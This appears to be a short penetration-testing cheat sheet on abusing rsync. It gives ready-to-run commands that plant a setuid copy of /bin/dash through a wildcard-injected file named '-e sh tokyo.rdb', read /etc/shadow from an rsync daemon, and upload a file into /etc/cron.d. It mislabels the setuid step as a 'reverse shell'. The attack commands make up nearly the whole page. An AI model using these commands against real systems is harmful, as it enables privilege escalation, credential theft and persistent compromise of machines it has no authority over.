Abusing Wildcards

rsync

Arbitrary Code Execution

Create the reverse shell:
echo -e '#!/bin/sh\ncp /bin/dash /var/tmp/tokyo\nchmod 4755 /var/tmp/tokyo' > tokyo.rdb
  • Then create the vulnerable file to invoke the shell:

touch -- '-e sh tokyo.rdb'

Sometimes it may be configured such that a password is not required

Arbitrary File Read
rsync -a rsync://backup:873/etc/shadow 
Arbitrary File Upload
rsync -avp clean rsync://backup:873/src/etc/cron.d/clean

Last updated